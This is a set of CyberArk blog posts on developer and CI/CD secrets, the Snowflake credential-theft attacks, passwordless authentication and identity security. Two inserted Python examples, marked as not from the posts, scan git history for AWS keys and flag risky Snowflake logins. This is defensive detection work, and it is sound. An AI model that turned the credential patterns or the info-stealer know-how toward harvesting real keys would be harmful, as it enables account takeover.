Mission Possible: Securing Developer Access, CI/CD and Code (With Love) https://www.cyberark.com/blog/mission-possible-securing-developer-access-ci-cd-and-code-with-love/ Wed, 24 Jul 2024 16:50:36 +0000

Okay, so you’re a security leader at your enterprise – congratulations! It’s a big, challenging role, as you know too well. You or a colleague are likely responsible for securing the cloud and legacy apps that drive critical revenue and customer engagement for your organization. But it’s not just the apps you need to secure. There’s also increased executive scrutiny and interest in ensuring that the build, testing and deployment processes are secure and won’t cause unplanned outages. These are unquestionably big tasks. And you know which teams write and run those cloud apps: the cloud team, platform engineers, DevOps admins and developers.

Understanding Developer and Cloud Teams

Developers, cloud engineers and DevOps admins: how well do you know these teams, and how important is security to them? Perhaps the better question is what the broader development teams actually want. It’s fair to say that security will be, at best, one of several competing priorities for many of these teams and roles.

First, developers, cloud engineers and operations staff all need access to cloud resources and a range of dev tools to do their jobs. But how much access do they need, and which tools do they merely use versus administer? Second, developers need to write code and build apps to get features to market quickly. They know their apps need to be secure, and in many cases the team is fairly sure the code is secure. But is it? Too often it isn’t, because of missing secure processes and tools, human error or a skipped step.

As security leaders, how well do we understand what it takes to secure developers’ build environments, pipelines and access requirements? What about production environments? How confident are we that we can restrict access to tools, enforce security processes, for instance, and not impact productivity and operations?

Providing Transparent Security Without Burdening Cloud Teams

So, what should we do to ensure the security of dev and cloud environments? In most cases, a mandate from the security team isn’t viable, and even if it is, how well will mandated tools and processes be adopted? You know the answer. But how can we ensure security without burdening developers with new processes and tools? Ideally, we could let them access and use cloud resources and secure secrets using the tools they already use and transparently ensure the tools, access and development processes are secure. By achieving this, security requirements will not burden development teams, and security can ensure that apps and development processes are secure. Providing security while staying out of the way, or at least being minimally visible, helps accelerate acceptance from the development and cloud teams.

Educating Developers: Security As a Pain Reliever (Lessons from A Snowboarder’s Lost Powder Day)

Developers also feel real pain and extra work when security fails. For example, when CircleCI, a widely used CI/CD service, disclosed that secrets stored in its platform might have been exposed, it advised customers to rotate every one of them. With automated rotation that is relatively easy; with manual rotation it is days of work for developers.

I recently saw this firsthand: one of my snowboarding buddies, a developer friend, was alerted on the chairlift that his organization’s cloud credentials had been hardcoded and posted to a code repository. Fortunately, it appeared the credentials had not been stolen. His team removed and secured the hardcoded credential… but didn’t rotate it. Duh, but he’s a developer, not a security person. The attacker got what they wanted with the original credential and stole their cloud resources; even when you delete versions in a code repository, the old versions are still there.

Sadly, my friend lost a powder day on the slopes (we don’t get many of those in New England), development slipped, and dev resources were wasted. It was a huge pain and embarrassment for him and his company – all because a credential was not rotated. The reality is, of course, that security incidents are always painful and never happen at convenient times.
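The lesson of the anecdote is that deleting a hardcoded credential from the latest commit does nothing about the copies that remain in history, forks and clones, so the credential must be rotated and any scanner must walk every historical diff. The following scanner is an added example, not code from the post or from CyberArk; it parses `git log -p` output for AWS access key IDs and secret keys (the key-ID prefixes and the 40-character secret format are AWS conventions; the sample log below is constructed and uses the example keys from AWS documentation) and reports every key that ever appeared, whether or not a later commit removed it.

```python
"""Scan `git log -p` output for AWS access key IDs and secret keys.

Added example (not from the CyberArk post). A credential removed in a later
commit is still in history, so every key that ever appeared needs rotation.
SAMPLE_LOG below is constructed for this example.
"""
import re
import subprocess
from dataclasses import dataclass

# Long-term user keys start with AKIA, temporary STS keys with ASIA; both are
# 20 characters. The 40-character secret has no fixed prefix, so it is only
# matched next to an assignment that names it.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
SECRET_KEY_RE = re.compile(
    r"(?i)aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})['\"]?"
)
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
FILE_RE = re.compile(r"^\+\+\+ b/(.+)")


@dataclass(frozen=True)
class Finding:
    commit: str
    path: str
    kind: str        # "access_key_id" or "secret_access_key"
    value: str
    removed: bool    # True when the matching line is a '-' line (deleted here)


def scan_git_log(log_text: str) -> list[Finding]:
    """Walk every diff line in the log and collect credential-looking strings."""
    findings = []
    commit = path = "?"
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            continue
        # Only '+'/'-' content lines matter; skip the '+++'/'---' file headers.
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue
        removed = line[0] == "-"
        body = line[1:]
        for v in ACCESS_KEY_RE.findall(body):
            findings.append(Finding(commit, path, "access_key_id", v, removed))
        for v in SECRET_KEY_RE.findall(body):
            findings.append(Finding(commit, path, "secret_access_key", v, removed))
    return findings


def still_needs_rotation(findings: list[Finding]) -> list[str]:
    """Every key ID that ever appeared, including ones a later commit deleted."""
    return sorted({f.value for f in findings if f.kind == "access_key_id"})


def scan_repo(repo_dir: str = ".") -> list[Finding]:
    """Run the scanner against a real repository: all branches, full patch text."""
    out = subprocess.run(
        ["git", "-C", repo_dir, "log", "--all", "-p", "--no-color"],
        capture_output=True, text=True, check=True,
    ).stdout
    return scan_git_log(out)


# Constructed sample: the second commit "fixes" the first by deleting the key.
SAMPLE_LOG = """\
commit 2222222 (HEAD)
Author: dev <dev@example.com>

    remove creds

diff --git a/deploy/config.py b/deploy/config.py
--- a/deploy/config.py
+++ b/deploy/config.py
@@ -1,3 +1,3 @@
-AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
-AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_SECRET_ACCESS_KEY = os.environ["AWS_SECRET_ACCESS_KEY"]
 REGION = "us-east-1"
commit 1111111
Author: dev <dev@example.com>

    add deploy config

diff --git a/deploy/config.py b/deploy/config.py
--- /dev/null
+++ b/deploy/config.py
@@ -0,0 +1,3 @@
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+REGION = "us-east-1"
"""

if __name__ == "__main__":
    found = scan_git_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("rotate:", still_needs_rotation(found))
```

Run against a real repository with `scan_repo("/path/to/repo")`; note that `--all` is what makes it cover branches that were never merged, which is where forgotten credentials tend to survive.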

Being Loved by Preventing Pain and Accelerating Development

If we can prevent dev teams from experiencing pain and have devs realize that security has their back, then security teams can be loved! The message to dev teams can be: Keep doing what you’re already doing, and we, security, will help keep you out of trouble! Or, even better, with automation tools, such as automated secrets onboarding from popular dev tools like Terraform, we (security) can help accelerate your development processes.

Now, that’s a win, and it puts security on track to be loved!

Taking a Holistic Approach to Security Avoids Impacting Agility

Let’s dive deeper into how we can deliver transparent security processes. Of course, we’ll need to take a broader perspective. While technology is a key enabler, it’s not just about technology; it’s also about people and processes. Developers want and expect to automate everything they do, so automated security processes are a key requirement.

And, when we talk to development leads, it’s clear they care a lot about security, and their collective voice echoes a common sentiment: “Security is non-negotiable, but it must not come at the cost of our agility and creativity.”


Achieving Transparent Security by Addressing People, Processes and Technology

Here are three essential requirements and challenges to consider (as you seek to be loved):

1. Technology. Let dev teams do what they are already doing without changing their workflows, processes or tools, or at least keep any changes to a minimum. Make security transparent to the developer. For example, allow developers and cloud teams to reach cloud resources through the cloud providers’ consoles they already use, while giving security teams precise, granular controls with zero standing privileges (ZSP).

If developers are already using Kubernetes Secrets or the cloud providers’ built-in (native) secrets vaults such as Azure Key Vault, AWS Secrets Manager or Google Secret Manager for securing their secrets – let developers keep using them while meeting corporate security mandates by transparently giving security teams a centralized view of all the secrets stores across the organization, providing and managing rotation and taking care of audit needs. This eliminates the need for dev teams to be concerned about secrets rotation or logging audit data. Instead, developers can access secrets from the native vaults just like they’ve done before.

While developers continue to access secrets from native vaults as they have always done, it is crucial to explore how centralized security measures can further enhance the protection of these secrets without disrupting existing workflows, as demonstrated in the ESG Showcase for AWS Applications.

2. People. A frequent, key challenge for security teams is working and aligning with the cloud teams. This alignment matters because even when security can offer developers a transparent solution, deploying it usually requires the cloud team to reconfigure access and other permissions in the cloud accounts.

In our recently published technical community blog, “Secrets Hub Success: Engaging with Your Cloud Teams,” CyberArk’s professional services team outlines approaches for reaching out and making requests to the organization’s cloud team.

3. Process. Establishing secure automated build environments and processes is a balancing act: what can be done to ensure CI/CD build and development processes are secure without burdening developers? While automation and technology play significant roles, there are also process steps that improve security and limit the damage from a compromise, such as segmenting access to code bases; creating pipelines automatically and destroying them after each build so that no build credential can be reused; requiring MFA at critical build steps, for instance to approve a pull or merge request; and, of course, severely restricting access to production environments.

Recognizing these challenges, the webinar titled “Software Development Environments in the Real World: Striking the Right Balance between Security and Innovation” offers insights into practical solutions. CyberArk development and R&D leaders draw upon research from the new book by O’Reilly Media and CyberArk, “Identity Security for Software Development: Building With Identity, Secrets and Credentials,” to address these concerns.

Collaborating with Dev and Cloud Teams – Don’t Force Technology

A holistic approach addressing technology, people and processes is essential to secure development environments and teams. No matter how good it may be, trying to force the latest security technology on dev and cloud teams risks frustration and lagging adoption. Instead, by taking a holistic approach, it is possible to be loved while securing developers’ access, CI/CD pipelines and code – and more “love” will help you drive higher levels of adoption of secure practices.

Partnering and Engaging – Key Approaches

Key elements that security teams have used to partner with development and cloud teams to establish secure build and development processes include:

  • Engaging with developer leads and cloud teams to understand their needs and challenges and to build trust.
  • Identifying and enabling security champions in the cloud and dev teams.
  • Offering flexible security solutions that minimize changes to developer workflows.
  • Providing automation solutions to help development teams maximize their efficiency.
  • Working with DevOps admins and the platform engineering teams to build process steps that boost security without burdening teams and impacting productivity.
  • Fostering a culture of shared responsibility for security. Highlighting potential burdens, such as rotation and audit, for which security is responsible.
  • Continuously educating and updating teams on best security practices.

By taking these steps, we can ensure that security becomes a fundamental part of the development process. This will lead to more secure and efficient development processes for your organization, which benefits everyone involved. And maybe it even generates a little love for you and the security team.

Chris Smith is a director of product marketing at CyberArk.

CIO POV: Rethinking Data Security Post-Snowflake Customer Attacks https://www.cyberark.com/blog/cio-pov-rethinking-data-security-post-snowflake-customer-attacks/ Wed, 17 Jul 2024 16:50:27 +0000

Watching the recent Snowflake customer attacks unfold felt a bit like rewatching a horror movie with predictable attack sequences and missed opportunities to run to safety. But this time, the ending was far more devastating. More than 100 organizations were exposed, and many are now grappling with the impacts of data theft and extortion in what some are calling one of the largest breaches in history.

As I reflect on the widely publicized incident, I keep coming back to the data. Data is what your organization is built on, what sets you apart. How you secure (or fail to secure) your data can dictate your fate. Threats don’t always knock directly on your door; increasingly, they reach into your tangled web of providers and partners to get to you. To protect your data, the lifeblood of your digital business, you’ve got to think bigger than your own organization. My top three takeaways from the Snowflake attacks reflect this reality.

1. Info stealers are everywhere and can cause rippling damage. The ShinyHunters group recently claimed responsibility for the Snowflake campaign, alleging that they gained access to organizations’ Snowflake accounts with the help of info stealer malware and an unsuspecting third-party contractor. Snowflake has not publicly confirmed this claim. However, its incident response partners stated that “stolen credentials obtained from multiple info stealer malware infections on non-Snowflake-owned systems were the point of entry for the attacks.”

Info stealers, malware designed to steal sensitive information, are widely used in credential-based attacks because they’re cheap, readily available and don’t require much technical know-how. Threat actors banking on poor password practices can purchase logs stolen by info stealers to launch targeted attacks that can ripple across supply chains. In the case of Snowflake, they hit the jackpot. Investigators found that 80% of the accounts used in the campaign had prior credential exposure and linked some credentials to infections as far back as 2020. If that doesn’t prompt organizations to beef up password policies for their employees and third parties, what will?

2. MFA isn’t optional. Period. Many of these identity-based attacks compromised Snowflake user accounts because the accounts did not require multi-factor authentication (MFA).

Inadequately protected credentials are (still) low-hanging fruit for attackers. As the threat landscape continues to evolve rapidly, MFA is a critical identity security layer, not a “nice to have.” Unfortunately, too many organizations have learned this the hard way, with 25% making (or increasing) investments in MFA and high assurance after an identity-related breach.

Breaking this cycle must start with increased SaaS provider support and can succeed only with consistent customer follow-through. Delivering secure solutions isn’t enough; critical SaaS vendors must also empower customers with the right controls and best practices to help them make sound security decisions. For example, SaaS customers should be able to mandate MFA for all user accounts, forgo SMS one-time codes and plain push approvals (both susceptible to MFA bypass attacks) in favor of phishing-resistant methods, and utilize biometrics to limit the effects of info stealers. In turn, these customer organizations must implement these advanced security controls consistently to reduce as much risk as possible.
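Both takeaways above (credentials exposed long before the campaign, and accounts that never required MFA) leave traces in a SaaS provider’s login telemetry. The detection below is an added example, not code from the post or from CyberArk. It mimics rows from Snowflake’s `SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY` view (the column names `USER_NAME`, `CLIENT_IP`, `REPORTED_CLIENT_TYPE`, `FIRST_AUTHENTICATION_FACTOR`, `SECOND_AUTHENTICATION_FACTOR` and `IS_SUCCESS` are the view’s real columns; the rows and the trusted network range are constructed) and flags two things: successful single-factor password logins from outside the corporate egress range, and a burst of failures followed by a success from the same user and IP, which is what a stuffed or purchased credential finally working looks like.

```python
"""Flag single-factor logins and failures-then-success in Snowflake login history.

Added example, not from the CyberArk post. Column names follow the
SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY view; SAMPLE_ROWS and TRUSTED_NETS
are constructed for this example. In production, feed the functions the
rows returned by a query against that view.
"""
import ipaddress
from collections import defaultdict

# Assumed corporate egress range (constructed); replace with your own.
TRUSTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def single_factor_logins(rows):
    """Successful password logins with no second factor from untrusted IPs.

    Federated (SAML2) and key-pair logins delegate MFA to the identity
    provider, so only FIRST_AUTHENTICATION_FACTOR == 'PASSWORD' is in scope.
    """
    return [
        r for r in rows
        if r["IS_SUCCESS"] == "YES"
        and r["FIRST_AUTHENTICATION_FACTOR"] == "PASSWORD"
        and not r["SECOND_AUTHENTICATION_FACTOR"]
        and not is_trusted(r["CLIENT_IP"])
    ]


def failures_then_success(rows, threshold=3):
    """Per (user, ip): at least `threshold` failed logins directly followed
    by a success, the signature of a guessed or stuffed credential working."""
    by_key = defaultdict(list)
    for r in sorted(rows, key=lambda r: r["EVENT_TIMESTAMP"]):
        by_key[(r["USER_NAME"], r["CLIENT_IP"])].append(r)
    hits = []
    for key, events in by_key.items():
        fails = 0
        for r in events:
            if r["IS_SUCCESS"] == "YES":
                if fails >= threshold:
                    hits.append((key, fails, r["EVENT_TIMESTAMP"]))
                fails = 0
            else:
                fails += 1
    return hits


def _row(ts, user, ip, client, first, second, ok):
    return {"EVENT_TIMESTAMP": ts, "USER_NAME": user, "CLIENT_IP": ip,
            "REPORTED_CLIENT_TYPE": client, "FIRST_AUTHENTICATION_FACTOR": first,
            "SECOND_AUTHENTICATION_FACTOR": second, "IS_SUCCESS": ok}


# Constructed sample rows (not real telemetry). ISO timestamps sort lexically.
SAMPLE_ROWS = [
    _row("2024-05-01T08:00:00", "ALICE", "203.0.113.10", "SNOWFLAKE_UI", "PASSWORD", "DUO_PUSH", "YES"),
    _row("2024-05-01T08:05:00", "BOB", "203.0.113.11", "SNOWFLAKE_UI", "SAML2", None, "YES"),
    _row("2024-05-01T09:00:00", "SVC_ETL", "198.51.100.7", "PYTHON_DRIVER", "PASSWORD", None, "YES"),
    _row("2024-05-02T01:00:00", "CAROL", "198.51.100.9", "JDBC_DRIVER", "PASSWORD", None, "NO"),
    _row("2024-05-02T01:00:05", "CAROL", "198.51.100.9", "JDBC_DRIVER", "PASSWORD", None, "NO"),
    _row("2024-05-02T01:00:10", "CAROL", "198.51.100.9", "JDBC_DRIVER", "PASSWORD", None, "NO"),
    _row("2024-05-02T01:00:15", "CAROL", "198.51.100.9", "JDBC_DRIVER", "PASSWORD", None, "YES"),
]

if __name__ == "__main__":
    for r in single_factor_logins(SAMPLE_ROWS):
        print("single-factor:", r["USER_NAME"], r["CLIENT_IP"], r["REPORTED_CLIENT_TYPE"])
    for key, n, ts in failures_then_success(SAMPLE_ROWS):
        print("failures-then-success:", key, n, ts)
```

Service accounts such as `SVC_ETL` will show up in the first list by design; that is the point, since a password-only service account reachable from the internet is exactly what an info stealer log buys an attacker, and the fix is key-pair or OAuth authentication plus a network policy rather than an exception.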

3.  Default encryption keys jeopardize data security. Lax identity security practices reportedly ignited this recent firestorm of attacks, while data security missteps fanned the flames. Specifically, numerous organizations relied on default encryption keys to protect their data within Snowflake’s platform instead of bringing their own keys.

Bring your own key (BYOK) is a widely accepted best practice for preserving security and centralized control of encrypted data. With BYOK, the customer creates and manages their own encryption keys for the application’s underlying cloud infrastructure (e.g., AWS, Google Cloud or Microsoft Azure). This gives the customer greater control over who and what can access their data within the application, full ownership of the data lifecycle and the ability to revoke the SaaS provider’s access to the keys when required. If an attacker manages to compromise the SaaS provider, directly or indirectly, the customer’s data remains encrypted and unintelligible once that access is revoked.

Five Steps to Strengthen Data Security in an Interconnected World

In the next 12 months, 84% of organizations will use three or more CSPs, and the number of SaaS applications will grow by 89%. (Source: CyberArk 2024 Identity Security Threat Landscape Report)

A compromise of one party can lead to a compromise of all. Is your organization prepared for the fallout? In the wake of the Snowflake customer attacks, here are five recommendations for enhancing cyber resilience across your supply chain, so you’re ready to face whatever comes next, wherever it comes from:

  1. Raise the bar for credential theft. Today’s thriving info stealer market further proves that passwords are the weakest link in the security chain. Make a game plan to secure all employee credentials and enforce an enterprise-wide password policy if you haven’t already done so. Stay current on emerging tactics, techniques and procedures (TTPs) involving info stealer malware and incorporate this threat intelligence into regular cybersecurity training. It may also be a good time to explore how passkeys could help your organization eliminate passwords from authentication workflows.
  2. Strengthen third-party authentication with PAM. Every cloud service provider, SaaS provider and third party you bring into your digital ecosystem increases your risk. Your identity security strategy must account for them all. Implement phishing-resistant MFA for outside parties with access to your sensitive data and infrastructure. Mirror the privileged access management (PAM) best practices established for internal purposes, such as storing privileged identities in a secure repository, isolating and monitoring sessions and provisioning just-in-time (JIT) access, to strengthen third-party authentication. Consider a vendor PAM solution that ties into your organization’s existing enterprise PAM solution to help improve efficiency and make it easier to apply policies consistently.
  3. Bring your own key (BYOK). When evaluating cloud-based solutions, particularly those that handle your sensitive information, make sure they support BYOK for data encryption. While BYOK isn’t completely fail-safe, it’s an additional security layer that could halt a dangerous chain reaction through the digital supply chain.
  4. Reduce complexity and gain visibility with SaaS security. Organizations are struggling to maintain visibility across disparate environments. This isn’t due to a lack of cybersecurity tools; 94% already use more than 10 identity-related vendors. Create a plan to consolidate your vendor stack (this may involve deprecating legacy systems) to the best tools for your environment. During this exercise, you may find that SaaS security is the right fit for your business. SaaS security offerings can help you centrally monitor business-critical SaaS programs and systems and gain full visibility on things like risky configurations and potential vulnerabilities. Armed with actionable insights, you can take the proper steps in the right priority order to decrease the attack surface.
  5. Assess critical vendors regularly. The visibility gap extends deep into the digital ecosystem, where risk from third- and fourth-party providers is challenging to evaluate regularly. Instead of trying to do everything at once, use a SaaS tool or establish a process to prioritize your most critical vendors, those who interact with your most sensitive data and assets. Then, establish a regular cadence for complete risk assessments and validation. Once a year is typically a good starting point.

An Incident Response Worth Rewatching

The Snowflake breach reminds us that no organization is immune to attacks while reinforcing the need for constant vigilance at both organizational and digital ecosystem levels. Throughout these difficult weeks, the Snowflake team acted swiftly and communicated transparently. I commend them for their response and the work they’re doing to advance customer cybersecurity protections. May their efforts help fuel a broader push toward security and resiliency standards for all critical SaaS vendors for the benefit of all.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

What ‘Passwordless’ Really Means for Privileged Access Management https://www.cyberark.com/blog/what-passwordless-really-means-for-privileged-access-management/ Thu, 11 Jul 2024 15:18:34 +0000

Privileged access management (PAM) programs aim to secure the highest-risk access in an organization, including using privileged credentials like passwords, SSH keys and application secrets. So, how can PAM and identity security teams prepare for a passwordless future? The answer lies in a deeper examination of what ‘passwordless’ really means and how PAM programs are modernizing to protect new identities and environments.

While the concept of passwordless authentication is not new, meaningful adoption has only begun in recent years. Several forms of passwordless authentication are gaining traction, ranging from physical factors like USB security keys and biometrics to digital factors like QR codes, passkeys and one-time codes delivered by SMS (the last being phishable and no longer recommended where stronger options exist). Each method can help efficiently validate a user’s access, which is central to the concept of Zero Trust.

Yet despite the benefits of these authentication formats, passwordless will not replace the need to secure high-risk access – with or without passwords and credentials.

Let’s explore why.

Analyzing Passwordless Authentication Factors

Authentication factors enabling an enterprise identity to connect to a resource are generally divided into three categories:

1. Knowledge factors, or something you know.
2. Possession factors, or something you have.
3. Inherence factors, or something you are.

Passwordless methodologies shift the authentication paradigm away from known passwords, a knowledge factor, opting instead to validate access with possession factors (such as a YubiKey or a passkey) and inherence factors (such as biometrics). In many cases, passwordless paradigms don’t truly eliminate secrets but rather abstract the secret away from the end user, just as modern privileged session management capabilities do.

These possession and inherence factors can make user logins faster and more seamless, in alignment with widely trusted standards for passwordless access, such as FIDO2 and the Web Authentication (WebAuthn) standard.

Abstracting Passwords Does Not Eliminate Risk

Passwordless authentication factors certainly reduce risk, but they can still be compromised. Biometric matching can be defeated by presentation attacks (spoofed fingerprints or faces); a stolen YubiKey or other hardware authenticator puts that factor in the attacker’s hands; and while phishing-resistant passkeys are far harder to steal than passwords, an attacker who controls the device, or the cloud account that syncs its passkey store, can use valid passkeys to reach their objectives. Consistent with a Zero Trust mindset, organizations must ‘assume breach’ and accept that no authentication factor is infallible.


Insider threats will also remain a risk with passwordless authentication. Changing authentication factors to improve user experience does not negate the risk of bad actors inside an organization’s directory or trusted roster of third-party vendors. Simply put, eliminating passwords does not eliminate the risk of compromised access.

Organizations will always need defense-in-depth controls to mitigate these risks, even with passwordless authentication paradigms. Tried-and-true PAM concepts like least privilege access, session isolation, privileged session audit and Identity Threat Detection and Response (ITDR) remain essential lines of defense that reduce the risk of identity compromise and lateral movement.

Why We Can’t Fully Replace Passwords – Yet

Today, several operational considerations prevent the full adoption of passwordless authentication. Here are several:

Compatibility. Many systems in an organization will always require passwords by default. For example, every organizational laptop, server and networked device has a built-in local administrator password. These credentials are top targets in ransomware attacks, which generally require local admin rights to execute malware on an endpoint and spread. PAM programs aim to remove these credentials on workstations and manage them securely in a vault.

Security teams lack proven paradigms for replacing these local admin passwords with passwordless authentication factors. The same is true of service accounts and other machine identities, most of which use secrets to authenticate machine-to-machine communications.

Shared account complexity. To reduce their attack surface or satisfy audit requirements, many organizations aim to reduce the number of accounts with access to their most sensitive resources. A common strategy is consolidating on a small number of highly privileged accounts shared by multiple IT and Cloud Ops users. Modern PAM programs then apply several layers of controls to secure these shared accounts. Since these accounts are shared between users, they generally rely on shared knowledge and require knowledge-based authentication factors like credentials.

Modern PAM programs aim to reduce the number of credentials and prevent their exposure to the end user, often obscuring them. In other words, ‘fewer passwords’ is as important as ‘passwordless’ authentication.

In cloud environments where federated access models are popular, some modern PAM programs also reduce password risk by embracing a zero standing privileges (ZSP) approach, creating and deleting entitlements for each privileged session. But even in cloud environments, every organization requires some level of shared privileged access, as the root and registration accounts required to set up a cloud environment can never be decommissioned. These root account credentials will always exist and must be secured with intelligent privilege controls.

Regulatory compliance. Auditors assessing an organization’s cybersecurity compliance with essential regulatory standards often look for defense-in-depth identity security. Some regulations require the use of passwords and careful controls on those passwords, such as implementing least privilege, multi-factor authentication (MFA), policy-based credential rotation and thorough audit visibility of password usage. Eliminating passwords outright can complicate and delay audit processes, ultimately impeding operations.

Backup Access. In emergency situations, passwords serve as a reliable fallback authentication method when passwordless options fail, ensuring users can access their accounts. In fact, many passwordless solutions even rely on credentials (or keys) on the backend. Since keys can be valuable targets for attackers, PAM programs must apply several layers of controls to secure them.

Expectations vs. Reality: Evaluating Passwordless Claims from Security Vendors

Many security vendors – including CyberArk – have smartly introduced passwordless authentication for users accessing their own platforms. However, despite bold claims from some vendors, these technologies cannot replace all passwords, SSH keys and application secrets today.

Identity security leaders are focusing on reducing the core problem – compromised credentials – with modern access models that reduce the number of passwords in play, such as just-in-time (JIT) access. Some technologies create ephemeral accounts and certificates that are not exposed to the end user. Other vendors use agent-based elevation on specific servers, though in this case, the servers still have built-in passwords that must be securely managed.

For these reasons, it’s essential to carefully evaluate claims that any security vendor can deliver a state of passwordless nirvana. The reality is that for the foreseeable future, nearly all organizations will rely on a wide variety of human and machine identities that need passwords to authenticate, making it essential to take a defense-in-depth approach to identity security.

Five Intelligent Privilege Controls for A Passwordless World

Even if we eventually succeed in removing the need for password-based access, heightened controls will still be needed on the highest-risk privileged access. Here are several:

1. Least privilege access. By reducing permissions for identities that authenticate without passwords, organizations can reduce lateral and vertical movement and limit a breach’s ‘blast radius.’ Least privilege is an essential element for a Zero Trust identity security strategy.

2. Session isolation. A passwordless world would still be plagued by ransomware and other forms of malware. Using proxy servers and bastion hosts to isolate highly privileged sessions helps prevent malware-compromised devices from reaching enterprise resources.

3. Session audit and screen recording. Regardless of how compliance requirements may evolve beyond passwords, organizations will need to review high-risk user activity and investigate potential incidents. To maximize the efficiency of audits, organizations will need a central review of end user sessions across long-lived systems, cloud workloads and services and web apps.

4. ITDR. Although proactive efforts are being made to reduce passwords, security teams will still need to detect malicious or anomalous behavior that could signal in-progress attacks – especially on their identity infrastructure. ITDR capabilities from leading identity security vendors can use AI and machine learning to detect known indicators of malicious access while flagging incidents to the security operations center (SOC) for automatic response and remediation.

5. Access with zero standing privileges. Even without passwords, organizations must reduce post-authentication risk. Organizations can reduce the blast radius of an attack by removing standing privileges and instead creating and deleting specific entitlements for specific users and sessions. A true ZSP posture requires that permissions are created and assigned on the fly and removed after use, with granular control of crucial TEA (time/duration, entitlements, approval) settings.


Interested in learning more about how modern PAM programs secure IT, third-party and cloud operations teams? Register for our upcoming webinar.


Sam Flaster is a director of product marketing at CyberArk.

Why Implementing Identity Security Doesn’t Have to Be Complicated https://www.cyberark.com/blog/why-implementing-identity-security-doesnt-have-to-be-complicated/ Wed, 10 Jul 2024 17:28:22 +0000

Every organization is different, with its own unique needs, challenges and goals. That means that IT solutions, and especially IT security, must be complex tools that are highly configurable and adaptable to various scenarios. IT security solutions must be flexible and robust enough to handle many situations. They must support complex organizational structures, geographical dispersion, local law implications, vast and diverse technology stacks, multiple platforms, services and applications, a spectrum of threat models or different levels of resources.

Identity security is no exception, as it deals with one of the most critical aspects of any organization: the identities and access rights of its users and devices. However, identity security is not only a complex and flexible tool but also a vital and urgent one. The traditional perimeter-based security model is no longer sufficient in the era of cloud computing, remote work and mobile devices. Users and devices can access sensitive data and resources from anywhere, anytime and on any platform. This means that the identity and access management (IAM) policies and practices must be more granular, dynamic and context-aware, considering factors such as location, device type, network, behavior and risk level.

Moreover, identity security has to cope with the growing sophistication and frequency of cyberattacks, especially those that target user credentials and access rights. According to Verizon’s 2024 Data Breach Investigations Report (DBIR), 76% of all breaches (Nov. 2022 through Oct. 2023) included the human element, with people involved through privilege misuse, use of stolen credentials, social engineering – or error. Three of these methods are directly linked to users’ identities. Attackers increasingly use phishing, credential stuffing, password spraying and brute force to gain unauthorized access to organizations’ assets and data. Today, they don’t hack in; they log in.

Therefore, identity security must detect and prevent such attacks using security-first access management, intelligent privilege controls and flexible identity governance and administration (IGA). However, the intricacies of configurations, interoperability and the need for a seamless identity security fabric raise the bar and demand a high level of expertise and experience from the defenders. Implementing identity security to secure your organization is a challenging task, and it has many pitfalls and nuances that can make or break your security posture.


Implementing identity security can seem as daunting as learning to drive a stick shift in a world where automatic transmissions are the norm. However, just as mastering a manual transmission can offer a driver more control and a better feel for the car, embracing the complexities of identity security can provide organizations with a more robust and nuanced defense against cyberthreats.

Avoiding the Pitfall of Oversimplified Identity Security Solutions

One might be tempted to look for a quick and easy way out of this daunting challenge. Instead of investing in a comprehensive and sophisticated identity security solution that can handle the complexity and diversity of today’s IT environments, one might opt for a patchwork of more straightforward and cheaper solutions that cover only basic use cases and don’t require much customization or integration. This might seem like a smart and cost-effective approach, but it comes with a high price: security gaps and vulnerabilities.

By relying on multiple disjointed solutions that don’t communicate or coordinate with each other, one creates a siloed and inconsistent security posture that leaves many blind spots and weak points for attackers to exploit. Moreover, one exposes the organization to unnecessary and avoidable threats by settling for simplistic solutions that don’t offer the granularity and flexibility needed to adapt to the changing context and risk level. For example, an endpoint least privilege solution that doesn’t support adaptive multi-factor authentication (MFA) might allow an attacker to wait for the right moment to bypass the login process with stolen or weak credentials.

A solution that doesn’t manage privileged access or lacks flexible IGA will undoubtedly have overprivileged users and an uncontrolled attack surface, failing to combat insider threats or lateral movement. A solution that doesn’t enable security-first access management or intelligent privilege controls might fail to detect and prevent anomalous or malicious behavior, such as accessing sensitive data from an unusual location or device.

Returning to my earlier analogy – navigating the complex landscape of identity security is akin to driving a high-performance vehicle on a racetrack: it requires precision, adaptability and the right tools for the job. Just as a race car driver wouldn’t rely on an automatic transmission for the nuanced control needed on the track, security teams need sophisticated identity security solutions that offer granular control and can adapt to the ever-changing threat environment.

An automatic transmission is great for a grocery run but won’t get you far on a racetrack.

Applying Frameworks to Overcome Identity Security Complexity

A much better and more strategic way to overcome the steep learning curve and resource requirement issue with comprehensive enterprise-grade solutions is to rely on built-in frameworks and templates that provide guidance and best practices for implementing a robust and comprehensive identity security solution. One example is default policies that can be easily activated and instantly improve security posture. These policies can cover common scenarios and use cases, such as password management, least privilege enforcement, access control and session monitoring. Implementing these policies can help avoid the hassle and complexity of creating them from scratch while benefiting from their protection and compliance. Better yet, built-in frameworks help hit the ground running and allow for the continuous evolution of security measures.

Such intuitive frameworks support a seamless transition to role-based least privilege policy development, accommodating the organization’s unique pace and needs. These built-in frameworks and templates are essential tools, simplifying the identity security journey while ensuring high-quality and effective outcomes. Although the intricacies of identity security are complex, the tools to implement it do not have to be.

